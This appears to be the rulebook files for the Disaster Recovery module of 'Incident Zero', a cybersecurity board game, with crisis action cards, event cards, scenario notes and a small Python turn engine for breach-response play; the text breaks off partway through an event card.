Small Breach (Beginner) — 50,000 records, opportunistic attacker, no subpoena (skip EVENT-12), total real-world loss ~$1-5M (narrative).

Medium Breach (Intermediate) — 500,000 records, ransom-seeking criminal group, full event timeline, total loss ~$5-50M (narrative).

Large Breach (Advanced) — 5M+ records, sophisticated attacker, use the scope variant (start computation at 80), total loss ~$50M+ (narrative).

Pressure Escalation

Decision Consequences


Sample Scenarios to Try

Scenario 1: "Credential Breach" (Small, Beginner)

Scope: 50,000 customer passwords exposed. Attacker: opportunistic; ransom demand small — try REFUSE and manage the fallout. Budget: 50. Focus: communicating bad news without panic. Lesson: even small breaches require careful stakeholder management.

Scenario 2: "Supply Chain Breach" (Medium, Intermediate)

Scope: 500,000 records via a compromised vendor. Budget: 50 (+ any carried over from prior modules). Focus: ACTION-04 Third-Party IR shines here; multi-stakeholder communication. Lesson: vendor relationships complicate crisis response.

Scenario 3: "Nation-State Attack" (Large, Advanced)

Scope: 5M+ records; attacker won't negotiate (ACTION-13 offers REFUSE only). Use the scope variant (start at 80). Focus: damage control; accept a "Damaged" tier as a good result. Lesson: some breaches are unwinnable; response quality still matters.


Extensions & Variations

Extended Crisis Mode (60 minutes)

Litigation Track

Competitive Breach Response


Next Steps After This Module

If you scored 70+ (Managed or better):
- Continue to Audit & Compliance Module → validate response procedures post-breach
- Transition to Hardening Module → prevent similar breaches

If you scored below 70:
- Discuss what went wrong
- Replay the scenario with different decisions
- Study real breach case studies (Target, Equifax, SolarWinds)

Standalone: play again with a different breach type or attacker profile


Need Help?


Disaster Recovery Module - Standalone Play Guide
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

cards/disaster-recovery/core-deck/crisis-action-cards.md

Disaster Recovery Module: Crisis Action Cards

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Overview

Crisis Action Cards represent the specific actions an organization can take during a breach to investigate, remediate, and respond. Teams deploy ONE Crisis Action each turn to advance three objectives: Investigation %, Remediation %, and Communication % (each tracked 0-100%). Track advances are deterministic — no dice are required to advance a track.

Money mapping: 1 Budget ≈ $50K. Dollar figures on cards (fines, ransom) use this mapping unless marked narrative-only.


Crisis Action Card Organization

Action Categories

Crisis Actions are organized into three categories, plus one decision card:

  1. Investigation Actions (4 cards)
     - Advance understanding of breach
     - Determine scope and impact
     - Gather evidence for forensics
     - Enable faster containment

  2. Remediation Actions (4 cards)
     - Fix vulnerability that was exploited
     - Contain compromised systems
     - Recover from backup
     - Rebuild infrastructure

  3. Communication Actions (4 cards)
     - Notify stakeholders
     - Manage media/public relations
     - Report to regulators
     - Maintain customer trust

  4. Crisis Decision (1 card)
     - ACTION-13: Ransom Decision (Pay / Negotiate / Refuse)

Multi-Turn Actions (v2.2)

Some actions list Duration N (N greater than 1). The rule, defined once:

Duration N: the action occupies your action slot only on the turn it is started; its track advance completes and is applied at the start of the Nth following turn. Only one multi-turn action may be in flight at a time. While it is in flight, you may take single-turn actions on later turns, but you may not start another multi-turn action.

Example: ACTION-01 (Duration 2) started on Turn 2 applies its +25% Investigation at the start of Turn 4.
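The Multi-Turn Actions rule, together with the turn sequence from the standalone guide's Gameplay Loop (start-of-turn completion of an in-flight action, decay and deadline penalties, one Crisis Action per turn, the free Holding Statement, Budget floor 0, immediate loss at 0% trust), as an added example in Python. This is not code from the Incident Zero rulebook; card costs, advances, durations and trust effects are the quick-reference values for a subset of the cards, while Scheduled/Triggered events, ACTION-13 and the Justification roll are left out. The `CUSTOMER_DECAY` amount is an assumption, since the rulebook names the decay but not its size:

```python
"""Turn engine for the Disaster Recovery multi-turn action rule (v2.2).

Added example, not code from the Incident Zero rulebook. It models the action
slot, Duration N scheduling (slot used only on the start turn, advance lands at
the start of the Nth following turn, one in flight at a time), the free Holding
Statement, the Budget floor and the start-of-turn decay penalties listed in the
standalone guide's turn sequence. Card numbers are the quick-reference values;
Scheduled/Triggered events, ACTION-13 and the Justification roll are omitted.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Assumption: the rulebook applies Customer decay from Turn 3 if nothing has been
# communicated yet but states no amount; 5 points per turn is a placeholder.
CUSTOMER_DECAY = 5


@dataclass(frozen=True)
class Card:
    id: str
    cost: int
    advance: Dict[str, int]                      # track -> percentage points
    duration: int = 1                            # Duration N on the card
    trust: Dict[str, int] = field(default_factory=dict)


CARDS = {
    "ACTION-01": Card("ACTION-01", 12, {"inv": 25}, 2, {"Regulators": 10, "Board": 5}),
    "ACTION-02": Card("ACTION-02", 8, {"inv": 15}),
    "ACTION-03": Card("ACTION-03", 5, {"inv": 10}),
    "ACTION-04": Card("ACTION-04", 20, {"inv": 30, "rem": 20}, 3,
                      {"Regulators": 15, "Board": 15}),
    "ACTION-06": Card("ACTION-06", 8, {"rem": 15}, 1, {"Executives": 5}),
    "ACTION-09": Card("ACTION-09", 10, {"comm": 20}, 1, {"Customers": 15, "Media": 5}),
    "ACTION-10": Card("ACTION-10", 8, {"comm": 10}, 1, {"Regulators": 20}),
    "HOLD": Card("HOLD", 0, {"comm": 5}),        # free Holding Statement (standing rule)
}


class RuleError(Exception):
    """A play that the turn rules do not allow."""


class Game:
    def __init__(self, budget: int = 50, max_turn: int = 8):
        self.turn, self.budget, self.max_turn = 0, budget, max_turn
        self.tracks = {"inv": 0, "rem": 0, "comm": 0}
        self.trust = {k: 50 for k in ("Customers", "Regulators", "Media", "Board", "Executives")}
        self.in_flight: Optional[Tuple[Card, int]] = None   # (card, turn its advance lands)
        self.communicated = self.customers_notified = self.regulators_notified = False
        self.slot_used = self.lost = False

    @staticmethod
    def _bump(meter: Dict[str, int], key: str, delta: int) -> None:
        meter[key] = max(0, min(100, meter[key] + delta))   # tracks and trust clamp 0-100

    def start_turn(self) -> int:
        if self.lost or self.turn >= self.max_turn:
            raise RuleError("the game is over")
        self.turn += 1
        self.slot_used = False
        # 1. a multi-turn action that finishes now lands its deferred track advance
        if self.in_flight and self.in_flight[1] == self.turn:
            for track, pts in self.in_flight[0].advance.items():
                self._bump(self.tracks, track, pts)
            self.in_flight = None
        # 2. decay / deadline penalties (event resolution would go here as well)
        if self.turn >= 3 and not self.communicated:
            self._bump(self.trust, "Customers", -CUSTOMER_DECAY)
        if self.turn >= 6 and not self.customers_notified:
            self._bump(self.trust, "Customers", -10)         # ACTION-09 past its Turn 5 window
        if self.turn >= 6 and not self.regulators_notified:
            self._bump(self.trust, "Regulators", -10)        # ACTION-10 escalation from Turn 6
        return self.turn

    def can_play(self, card_id: str) -> Optional[str]:
        """Return the rule a play would break, or None if it is legal."""
        card = CARDS[card_id]
        if self.slot_used:
            return "one Crisis Action card per turn"
        if card.duration > 1 and self.in_flight:
            return "only one multi-turn action may be in flight"
        if card.cost > self.budget:
            return "Budget floor is 0; only the Holding Statement is free"
        return None

    def play(self, card_id: str) -> None:
        reason = self.can_play(card_id)
        if reason:
            raise RuleError(reason)
        card = CARDS[card_id]
        self.budget -= card.cost
        self.slot_used = True
        # Trust effects apply this turn (step 3 of the sequence); the track advance of
        # a Duration N card is deferred to the start of the Nth following turn.
        for who, delta in card.trust.items():
            self._bump(self.trust, who, delta)
        if card.duration == 1:
            for track, pts in card.advance.items():
                self._bump(self.tracks, track, pts)
        else:
            self.in_flight = (card, self.turn + card.duration)
        self.communicated |= "comm" in card.advance
        self.customers_notified |= card_id == "ACTION-09"
        self.regulators_notified |= card_id == "ACTION-10"

    def end_turn(self) -> bool:
        """Step 4: any trust meter at 0% is an immediate loss."""
        self.lost = any(v == 0 for v in self.trust.values())
        return self.lost
```

Playing ACTION-01 on Turn 2 with this engine shows the rule's two halves separately: the Regulators +10 / Board +5 trust effects land on Turn 2, the +25% Investigation only at the start of Turn 4, and `can_play("ACTION-04")` on Turn 3 reports the in-flight limit while single-turn cards such as ACTION-03 remain legal.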

Justification Bonus (v2.2) — optional

The signature d20 stays as an optional bonus only (it never gates track advancement): when a team plays an Action card with a strong, specific technical justification, the Threat Orchestrator may allow a d20 roll. On 11+, that action's track advance gains +5%. One roll per action card played.

Free Action: Holding Statement (v2.2)

This is a standing rule, not a numbered card. On any turn, instead of playing an Action card, the team may issue a Holding Statement (internal update / brief public status statement):


Investigation Actions

ACTION-01: Forensic Analysis

Category: Investigation
Cost: 12 Budget
Investigation Advance: +25%
Duration: 2 turns (multi-turn action)

Description: Forensic experts analyze compromised systems to determine:
- What data was accessed
- What was exfiltrated
- How long attacker had access
- What attack techniques were used
- Evidence for legal proceedings

Key Details:
- Requires shutting down compromised system (removes it from operation)
- Requires forensics team (may need external consultants)
- Takes time (2 turns minimum)
- Provides detailed evidence
- Essential for legal action and regulatory compliance

When to Use:
- Need definitive answer about breach scope
- Legal action is likely
- Compliance investigation required
- Regulatory agency involved

Risk if Not Done:
- Cannot determine full extent of damage
- Cannot properly remediate (may miss persistence)
- No evidence for law enforcement
- Regulatory penalties for inadequate investigation

Regulatory Impact:
- Most breach notification laws require "reasonable investigation"
- Forensics evidence may be required for regulatory compliance
- Better investigation = stronger regulatory defense

Team Trade-off:
- Expensive (12 Budget)
- Takes time (2 turns)
- But provides high investigation %
- Provides evidence for future action


ACTION-02: Threat Hunting

Category: Investigation
Cost: 8 Budget
Investigation Advance: +15%
Duration: 1 turn

Description: Security team proactively searches logs and systems for:
- Other compromised systems
- Lateral movement indicators
- Persistence mechanisms
- Command & Control communication
- Evidence of data staging

Key Details:
- Requires SIEM with good logging (if available)
- Team searches for attack indicators
- Can discover secondary compromises
- Lower cost than forensics but less detailed
- Faster than forensics (1 turn)

When to Use:
- Need to know if compromise spread
- Want to find hidden persistence
- Time is critical (forensics takes 2 turns)
- Budget is constrained

Risk if Not Done:
- May not discover all compromised systems
- Attacker may maintain hidden access
- May lose evidence over time (logs rotate)
- Compliance investigation may be incomplete

Regulatory Impact:
- Shows good faith investigation effort
- Supports "reasonable investigation" standard
- Evidence of proactive security posture

Team Trade-off:
- Cheaper than forensics (8 Budget)
- Faster (1 turn vs. 2)
- Less detailed evidence
- Good balance of cost/time/effectiveness


ACTION-03: Log Analysis

Category: Investigation
Cost: 5 Budget
Investigation Advance: +10%
Duration: 1 turn

Description: Security team reviews available logs (firewall, VPN, Windows Event Log, application logs) to understand:
- When breach was discovered
- What access was gained
- What systems were accessed
- What data might have been accessed
- Timeline of attack

Key Details:
- Requires logs (must have been collecting logs)
- Basic analysis of existing logs
- Cheapest investigation action
- Quick (1 turn)
- Limited by log retention/quality
- Can be done internally (no external consultants)

When to Use:
- Budget is extremely tight
- Need quick preliminary understanding
- Good logging infrastructure in place
- Time is critical

Risk if Not Done:
- No understanding of what happened
- Cannot determine scope or impact
- Regulatory agencies upset about lack of investigation
- Potential for incomplete response

Regulatory Impact:
- Minimal investigation (may not satisfy "reasonable investigation")
- Shows attempt at investigation
- Not sufficient as sole investigation method

Team Trade-off:
- Cheapest investigation (5 Budget)
- Fastest (1 turn)
- Limited effectiveness
- Often insufficient alone


ACTION-04: Third-Party Incident Response Engagement

Category: Investigation (+ Remediation)
Cost: 20 Budget
Investigation Advance: +30% (+ Remediation +20%)
Duration: 3 turns (ongoing engagement)

Description: Bring in external incident response firm (forensics, incident handling, remediation specialists). They conduct:
- Comprehensive forensic investigation
- Breach scope determination
- Remediation recommendations
- Expert testimony for legal proceedings
- Regulatory coordination

Key Details:
- Very expensive (20 Budget)
- Takes significant time to mobilize
- Provides expert guidance and credibility
- Provides evidence acceptable in court
- Supports regulatory defense
- Multi-turn (Duration 3): occupies your action slot only on the turn started; see Multi-Turn Actions rule

When to Use:
- Major breach with legal implications
- Need expert investigation for court
- Regulatory agency demands expertise
- Internal team cannot handle scope
- Liability is significant

Benefits:
- Expert investigation (higher quality)
- Evidence for prosecution
- Regulatory/legal credibility
- Expert testimony available
- Ongoing support (3 turns)

Risk if Not Done:
- Without external expertise, breach response may be insufficient
- Legal case may fail (poor evidence)
- Regulatory penalties for inadequate investigation
- May miss critical evidence

Regulatory Impact:
- High credibility with regulators
- Better legal defense
- Shows serious investigation effort
- External experts satisfy "reasonable investigation"

Team Trade-off:
- Most expensive (20 Budget)
- Long commitment (Duration 3 — advances apply at the start of the 3rd following turn)
- But provides significant investigation + remediation
- Provides external expertise and credibility
- While in flight you may take single-turn actions, but no other multi-turn action (v2.2 Multi-Turn rule)


Remediation Actions

ACTION-05: Patch & Harden (Affected Systems)

Category: Remediation
Cost: 10 Budget
Remediation Advance: +20%
Duration: 1 turn

Description: Apply patches to the vulnerability that was exploited:
- Install OS patches (if vulnerability is OS-level)
- Update application (if vulnerability is app-level)
- Change default credentials
- Remove backdoor accounts
- Harden network configuration

Key Details:
- Targets the specific vulnerability that was exploited
- Must know what vulnerability was exploited (requires investigation)
- Can be done on specific systems or organization-wide
- Prevents same attack from succeeding again
- Does NOT remove attacker if already inside

When to Use:
- Know what vulnerability was exploited
- Want to prevent re-exploitation
- Can apply patch without affecting business
- Quick remediation needed

Risk if Not Done:
- Attacker can re-exploit same vulnerability
- Breach scope may grow
- Regulatory agency upset about lack of remediation
- Risk of breach happening again

Regulatory Impact:
- Shows timely remediation
- Prevents recurrence
- Good compliance posture
- Regulatory agencies expect patching

Team Trade-off:
- Moderate cost (10 Budget)
- Quick (1 turn)
- Fixes vulnerability
- But only prevents re-exploitation, doesn't remove attacker


ACTION-06: Containment (Isolate Compromised Systems)

Category: Remediation
Cost: 8 Budget
Remediation Advance: +15%
Duration: 1 turn

Description: Remove compromised systems from network to:
- Stop attacker from using compromised system for lateral movement
- Prevent attacker from exfiltrating more data
- Preserve compromised system for forensics
- Limit blast radius of compromise

Key Details:
- Disconnect compromised system from network (kill network)
- System is still available for forensics
- Stops active attacker in that system
- Does NOT affect attacker if they're in other systems
- May impact business (systems are unavailable)

When to Use:
- Know which systems are compromised
- Want to stop active attacker
- Can tolerate system downtime
- Attacker is still actively in system

Risk if Not Done:
- Attacker continues using compromised system
- Lateral movement continues
- More data exfiltration
- Attacker may install additional backdoors

Regulatory Impact:
- Shows swift containment action
- Demonstrates incident response
- Limits liability (stopped attacker)
- Good compliance posture

Team Trade-off:
- Moderate cost (8 Budget)
- Quick (1 turn)
- Stops active attacker
- But impacts business operations


ACTION-07: System Rebuild/Recovery from Backup

Category: Remediation
Cost: 15 Budget
Remediation Advance: +25%
Duration: 2 turns (restore + verification)

Description: Rebuild compromised systems from backup:
- Restore system from clean backup (pre-compromise)
- Apply patches to prevent re-exploitation
- Restore only clean data
- Verify system is clean before returning to production
- Monitor restored system for attacker re-entry

Key Details:
- Requires backup of system (must exist and be clean)
- Takes time to restore (2 turns minimum)
- Removes all attacker artifacts
- Ensures system is truly clean
- Most reliable remediation method
- Dependent on backup quality/testing

When to Use:
- Backup exists and is verified clean
- System compromise is extensive
- Want to ensure complete attacker removal
- Business can tolerate 2-turn rebuild

Risk if Not Done:
- Attacker may maintain persistence (if system not rebuilt)
- Restore from backup with attacker in it = no improvement
- Compliance may require clean rebuild

Regulatory Impact:
- Shows complete remediation
- Demonstrates thorough approach
- Better regulatory outcome
- Shows commitment to clean recovery

Team Trade-off:
- Higher cost (15 Budget)
- Takes time (2 turns)
- But provides complete remediation
- Most reliable method


ACTION-08: Change Credentials & Access Controls

Category: Remediation
Cost: 6 Budget
Remediation Advance: +12%
Duration: 1 turn

Description: Revoke and reset all potentially compromised credentials:
- Reset passwords for all accounts that touched compromised system
- Revoke tokens/API keys
- Reset VPN credentials
- Update database passwords
- Revoke certificates/SSH keys

Key Details:
- Prevents attacker from using stolen credentials
- Must do if credentials were compromised (stolen by Mimikatz, etc.)
- Can cause business disruption (users locked out)
- Quick and important
- Often overlooked but critical

When to Use:
- Credentials were likely compromised
- Attacker had access to credential stores
- Need to prevent attacker re-entry via stolen credentials
- Quick credential reset is possible

Risk if Not Done:
- Attacker can use stolen credentials to re-enter
- Lateral movement using stolen creds continues
- Breach is not truly contained
- Regulatory violation (allowing unauthorized access)

Regulatory Impact:
- Essential remediation step
- Shows understanding of attack chain
- Prevents credential reuse attacks
- Regulatory expectation

Team Trade-off:
- Low cost (6 Budget)
- Quick (1 turn)
- Important and often overlooked
- Can cause short-term business disruption


Communication Actions

ACTION-09: Customer Notification

Category: Communication
Cost: 10 Budget
Communication Advance: +20%
Duration: 1 turn (but affects later turns)
Deadline (v2.2): Recommended by end of Turn 5. If not completed by then: Customer trust -10 at the start of each later turn; if never completed in-game: -15 Reputation at final scoring (deferred statutory violation).

Description: Notify customers that their data may have been breached:
- Determine which customers were affected
- Prepare notification message
- Send via email, mail, or phone
- Provide information about what was accessed
- Offer credit monitoring/identity protection if applicable
- Field customer questions/complaints

Key Details:
- Required by breach notification laws ("without unreasonable delay" in California and most U.S. states; GDPR requires notifying individuals without undue delay when risk is high)
- Can be very expensive if many customers affected
- Notification can cause loss of customer trust
- Early notification shows good faith
- Delayed notification shows company doesn't care
- Impacts Customers stakeholder directly

Regulatory Requirements:
- Most laws require notification "without unreasonable delay"; some states set specific outer limits
- California: notify without unreasonable delay; CCPA statutory damages fuel class actions
- Notification must include:
  - What information was accessed
  - Recommended actions
  - Contact information
  - Free credit monitoring (sometimes)

When to Use:
- Customer data was accessed in breach
- Regulatory requirement to notify
- Want to rebuild customer trust
- Transparency is important

Risk if Not Done:
- Regulatory violation (fines, penalties)
- Customer discovery + lawsuits
- Loss of customer trust (worse than notification)
- Reputation damage from cover-up worse than from breach

Regulatory Impact:
- Many states REQUIRE customer notification
- California law, GDPR, and other state laws all require notification; CCPA statutory damages fuel class actions
- Without notification = regulatory violation + fines
- Proactive notification = better regulatory relationship

Team Trade-off:
- Moderate cost (10 Budget)
- Can be done quickly (1 turn)
- Required by law (usually)
- Impacts Customers stakeholder (see Stakeholder Cards)
- Must be done eventually


ACTION-10: Regulatory/Law Enforcement Notification

Category: Communication
Cost: 8 Budget
Communication Advance: +10%
Duration: 1 turn (but ongoing for months)
Deadline (v2.2): Must be completed by end of Turn 8 (the GDPR 72-hour anchor). Escalating penalty from Turn 6: if not yet completed, Regulator trust -10 at the start of Turns 6, 7, and 8. If never completed in-game: -20 Reputation at final scoring (deferred fine).

Description: Notify appropriate regulatory agencies:
- Contact FBI/Secret Service (federal crimes)
- Contact state attorney general (breach notification)
- Contact relevant sector regulator (HHS for healthcare, OCC for banking, etc.)
- Contact DHS (if critical infrastructure)
- Coordinate with law enforcement

Key Details:
- Required by law in many cases (healthcare, financial, etc.)
- May trigger investigation by law enforcement
- Can help recover stolen data
- Provides some legal protection
- Can delay prosecution (if they're investigating)
- Required before public disclosure in some cases

Regulatory Requirements:
- EU data (GDPR): Must notify the supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER (narrative-only figure)
- Healthcare (HIPAA): Must report to HHS Office for Civil Rights
- Financial (GLBA/FFIEC): Must report to banking regulators
- Payment cards (PCI-DSS): Must report to card networks
- Critical infrastructure: Must report to DHS/CISA

When to Use:
- Data breach triggers regulatory requirement
- Want law enforcement assistance
- Want to establish good faith investigation
- Legal team recommends it

Risk if Not Done:
- Regulatory violation if required
- Law enforcement cannot assist
- Company appears to be hiding breach
- Regulators may impose penalties

Regulatory Impact:
- Required in many cases (legal obligation)
- Shows cooperation with authorities
- May help recover stolen data
- Better regulatory relationship
- May reduce penalties (self-reporting)

Team Trade-off:
- Moderate cost (8 Budget)
- Ongoing (involves multiple turns of coordination)
- Required by law (usually)
- Impacts Regulators stakeholder (see Stakeholder Cards)
- Must be done in most cases


ACTION-11: Media/Public Relations Management

Category: Communication
Cost: 12 Budget
Communication Advance: +15%
Duration: 1 turn (but ongoing for days/weeks)

Description: Manage media coverage and public perception:
- Prepare press statement
- Contact media proactively
- Manage social media response
- Coordinate CEO/executive messaging
- Defend company reputation
- Provide accurate information to media

Key Details:
- Can heavily influence public perception
- Proactive messaging better than reactive
- Media coverage can amplify damage
- Poor communication = reputation disaster
- Good communication = company "handled it well"
- PR firm may be needed (crisis PR)

When to Use:
- Breach is significant (likely to attract media)
- Company has public reputation risk
- Customers are media-aware (B2C more than B2B)
- Proactive messaging is possible

Risk if Not Done:
- Media covers story with only attacker's perspective
- Reputation damage from poor response
- Stock price may drop (if public company)
- "No comment" looks like company is hiding
- Social media amplifies negative coverage

Impact if Done Well:
- "Company handled breach responsibly"
- Trust is maintained or recovered
- Stock price less impacted
- Reputation damage is contained
- Customer retention better

Team Trade-off:
- Higher cost (12 Budget)
- Ongoing (multiple turns)
- Impacts Media/Board stakeholder (see Stakeholder Cards)
- Critical for public companies
- Can significantly affect perception


ACTION-12: Board & Shareholder Communication

Category: Communication
Cost: 9 Budget
Communication Advance: +12%
Duration: 1 turn (but triggers Board Meeting - see Event Cards)

Description: Inform board of directors and shareholders about breach:
- Prepare incident briefing for board
- Present forensics findings
- Discuss regulatory/legal implications
- Present remediation plan and costs
- Discuss risk mitigation going forward
- Field board questions

Key Details:
- Board must be informed promptly
- Disclosure may be required (SEC rules if public company)
- Board has fiduciary duty to inform shareholders
- Lawsuit risk if board hides information
- Board can fire CEO if response is poor
- Must include implications for D&O insurance

Regulatory Requirements:
- SEC disclosure rules (if public company)
- State corporate law (fiduciary duty)
- Insurance requirements (D&O coverage)

When to Use:
- Board needs to understand breach
- Public company (SEC disclosure likely needed)
- Board questions will come (better to be prepared)
- Shareholder lawsuits are likely

Risk if Not Done:
- Board discovers breach from media = crisis of confidence
- Shareholder lawsuits for non-disclosure
- SEC investigation for disclosure violations
- CEO may be fired (looked like hiding information)
- Stock price crashes when discovered

Impact if Done Well:
- Board is informed and supportive
- No surprise when disclosed
- Board can defend company (if sued)
- Stock market takes news in stride
- Organized response is possible

Team Trade-off:
- Moderate cost (9 Budget)
- Critical for public companies
- Impacts Board stakeholder (see Stakeholder Cards)
- Required by law (usually)
- Complete before EVENT-04 (Board Meeting, scheduled Turn 3) to be "prepared" (see Event Cards)


ACTION-13: Ransom Decision (v2.2)

Category: Crisis Decision
Cost: Varies by option (see below)
Timing: Play at any time before the ransom deadline (default: start of Turn 5). Playing this card does NOT use your turn's action slot — it is a decision made in addition to your normal action. Once per game. If no decision is made by the deadline, the team is treated as having chosen REFUSE. Used only in scenarios with a ransom/extortion demand.

Choose exactly ONE option:

Option A — PAY
- Cost: 20 Budget (≈ $1M at 1 Budget ≈ $50K)
- Reputation: -15 at final scoring
- Effect: The data-publication event is skipped/cancelled. +20% Remediation immediately (decryption keys restore systems).
- No guarantee: The Threat Orchestrator rolls a d20. On 1-5, the keys don't work — no refund, and the Remediation advance is +0% instead of +20%. (The publication event stays cancelled; the attacker took the money and moved on.)
- Flavor: "Criminals are not a customer-service organization."

Option B — NEGOTIATE
- Cost: 5 Budget (negotiator/counsel fees)
- Reputation: -5 at final scoring
- Effect: The data-publication event is delayed by 2 turns (default: from start of Turn 5 to start of Turn 7). Buys time to notify stakeholders and remediate before publication.

Option C — REFUSE
- Cost: 0 Budget
- Reputation: No immediate change. If the data-publication event triggers later: -20 Reputation at final scoring.
- Effect: No payment, no delay. Focus budget on investigation, remediation, and communication.

Data-Publication Event (reference): In ransom scenarios, if the team has not PAID by the ransom deadline (default: start of Turn 5; +2 turns if NEGOTIATE), the attacker publishes stolen data: Customer trust -20, Media trust -15 (and the REFUSE scoring penalty above, if applicable).

Legal & practical facts (corrected v2.2):
- Payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage
- Law enforcement (FBI) discourages payment — it funds and incentivizes future attacks
- Payment does not guarantee data deletion or working keys

Educational Purpose: There is no "right" answer — payment is a genuine trade-off between operational recovery, ethics, legality, and reputation.


Crisis Action Card Summary

| Card | Category | Cost | Advance | Duration | Key Benefit |
|---|---|---|---|---|---|
| ACTION-01 | Investigation | 12 | +25% | 2 turns | Expert forensics |
| ACTION-02 | Investigation | 8 | +15% | 1 turn | Find hidden compromises |
| ACTION-03 | Investigation | 5 | +10% | 1 turn | Quick log analysis |
| ACTION-04 | Investigation | 20 | +30% Inv / +20% Rem | 3 turns | Third-party expertise |
| ACTION-05 | Remediation | 10 | +20% | 1 turn | Fix vulnerability |
| ACTION-06 | Remediation | 8 | +15% | 1 turn | Contain attacker |
| ACTION-07 | Remediation | 15 | +25% | 2 turns | Clean rebuild |
| ACTION-08 | Remediation | 6 | +12% | 1 turn | Revoke access |
| ACTION-09 | Communication | 10 | +20% | 1 turn | Notify customers (by Turn 5) |
| ACTION-10 | Communication | 8 | +10% | 1 turn | Notify regulators (by Turn 8) |
| ACTION-11 | Communication | 12 | +15% | 1 turn | Media management |
| ACTION-12 | Communication | 9 | +12% | 1 turn | Board notification (before Turn 3) |
| ACTION-13 | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant | Ransom decision (once per game) |
| Free | Communication | 0 | +5% | 1 turn | Holding Statement (standing rule, not a card) |

Budget floor (v2.2): Budget can never go below 0. If you cannot afford any card, the free Holding Statement is always available.


Gameplay Strategy

Three Competing Objectives

Teams must balance three objectives (each goes 0-100%):
- Investigation %: Understand scope and impact
- Remediation %: Fix vulnerability and remove attacker
- Communication %: Manage stakeholders and public perception

Investigation vs. Remediation Trade-off

Investigation-Heavy Strategy:
- Spend early turns investigating (ACTION-01, ACTION-02, ACTION-04)
- Then remediate with full knowledge
- Advantage: Know exactly what happened
- Disadvantage: Takes time, attacker may still be active

Remediation-Heavy Strategy:
- Contain and clean immediately (ACTION-06, ACTION-07, ACTION-08)
- Investigate after containment
- Advantage: Stop attacker quickly
- Disadvantage: May miss something, incomplete cleanup

Balanced Strategy:
- Do some investigation + some remediation each turn
- Use cheaper actions (ACTION-03, ACTION-06, ACTION-08)
- Save expensive actions for critical moments
- Advantage: Steady progress on all three objectives

Communication Strategy

Early Communication:
- Notify stakeholders early (ACTION-09, ACTION-10, ACTION-12)
- Show proactive response
- Maintain trust and credibility

Late Communication:
- Wait until full picture is known
- Risk: Stakeholders discover from media
- Risk: Looks like hiding information

Selective Communication:
- Notify regulators (required by law)
- Delay customer notification (if allowed)
- Focus on internal response first

Mandatory Beats & Budget (v2.2)

With 50 Budget, the mandatory crisis beats are always affordable:

Cheapest mandatory path: 5 + 8 + 10 + 6 = 29 Budget. A stronger balanced path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44 Budget — still within 50.


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by action category:
     - Blue (Investigation): ACTION-01 to ACTION-04
     - Red (Remediation): ACTION-05 to ACTION-08
     - Green (Communication): ACTION-09 to ACTION-12
     - Gold (Crisis Decision): ACTION-13
  3. Include cost in bold on card
  4. Include progress bars (Investigation %, Remediation %, Communication %)
  5. Cut along dotted lines
  6. Track sheets (progress tracks, stakeholder trust): see print pack (coming)

Disaster Recovery Module: Crisis Action Cards · Part of Incident Zero, a modular cybersecurity board game · v2.2 - Playtest Edition

cards/disaster-recovery/core-deck/event-cards.md

Disaster Recovery Module: Event Timeline Cards

Version: 2.2 - Playtest Edition
Last Updated: October 2025


Overview

Event Cards represent external events that occur during the crisis—some predictable deadlines, some escalations triggered by the team's situation. Events create time pressure and complicate the response.

Money mapping: 1 Budget ≈ $50K. Dollar figures are narrative unless converted to Budget on the card.


The Crisis Clock (v2.2)

The game lasts 8 turns. Each turn is one crisis phase of roughly 6-12 hours of narrative time:

| Turn | Narrative Time | Anchor |
|---|---|---|
| 1 | Detection +6h | Internal discovery |
| 2 | +12h | Legal/executive escalation complete |
| 3 | +18h | Board meets |
| 4 | +24h | Day 1 ends |
| 5 | +36h | Customer notification recommended deadline; default ransom deadline |
| 6 | +48h | Regulatory escalation begins |
| 7 | +60h | Legal/government pressure peaks |
| 8 | +72h | GDPR 72-hour regulatory notification deadline — game ends |

All deadlines in this module use this clock. There are no other timers.


Event Deck Procedure (v2.2)

At setup:
  1. Place the 6 Scheduled events face-down on the timeline at their printed turns.
  2. Place the 6 Triggered events face-up in a reference row where everyone can read their trigger conditions.

Each turn (start of turn):
  1. Reveal and resolve any Scheduled event placed on this turn.
  2. Check every un-fired Triggered event's condition; resolve any whose condition is now met.
  3. Each event fires once per game.

Trust changes from events clamp to 0-100%. Budget changes clamp to a floor of 0.


Scheduled Events

EVENT-01: First Media Coverage

Scheduled: Turn 2
Type: Discovery

Description: A news outlet publishes a story about the breach:
- "Company Suffers Data Breach" headline
- Unnamed source gives details
- Story spreads on social media
- Phone starts ringing with reporter calls

Resolution:
- If ACTION-11 (Media Management) was completed before this turn: Media trust +5 (proactive framing works)
- Otherwise: Media trust -10 (the story runs without your side)

Duration: Ongoing narrative (media coverage continues)


EVENT-04: Board Meeting

Scheduled: Turn 3
Type: Governance

Description: The board of directors holds an emergency meeting to review breach scope, investigation progress, remediation plan, budget, and executive performance.

Resolution:
- If ACTION-12 (Board Communication) was completed before this turn: Board trust +10 (prepared briefing)
- Otherwise: Board trust -20 (the board learns details from the news, not from you)

Team Preparation:
- Should have forensics/investigation underway
- Should have preliminary findings
- Should have a communication plan
- CEO should be briefed


EVENT-03: Customer Notification Window

Scheduled: Turn 5
Type: Deadline checkpoint

Description: Counsel confirms customer notification should not wait any longer. Real-world laws require notification "without unreasonable delay" — in this game, the recommended deadline is end of Turn 5.

Resolution:
- If ACTION-09 (Customer Notification) is completed by end of Turn 5: no penalty. If it was framed transparently, +5 Reputation at final scoring.
- If not: Customer trust -10 now and at the start of each later turn until ACTION-09 is completed.
- Deferred consequence: if customers are never notified in-game, -15 Reputation at final scoring (the statutory notification window is missed after the game ends).


EVENT-09: Shareholder Pressure

Scheduled: Turn 5 (public companies only — skip for private companies)
Type: Governance

Description: Shareholder activists contact the board: demand explanations, threaten a proxy fight, and give interviews about leadership failure.

Resolution:
- If ACTION-12 (Board Communication) has been completed: Board trust -5 (pressure is absorbed)
- Otherwise: Board trust -15


EVENT-02: Regulatory 72-Hour Deadline

Scheduled: Turn 6 (escalation begins; final deadline end of Turn 8)
Type: Deadline

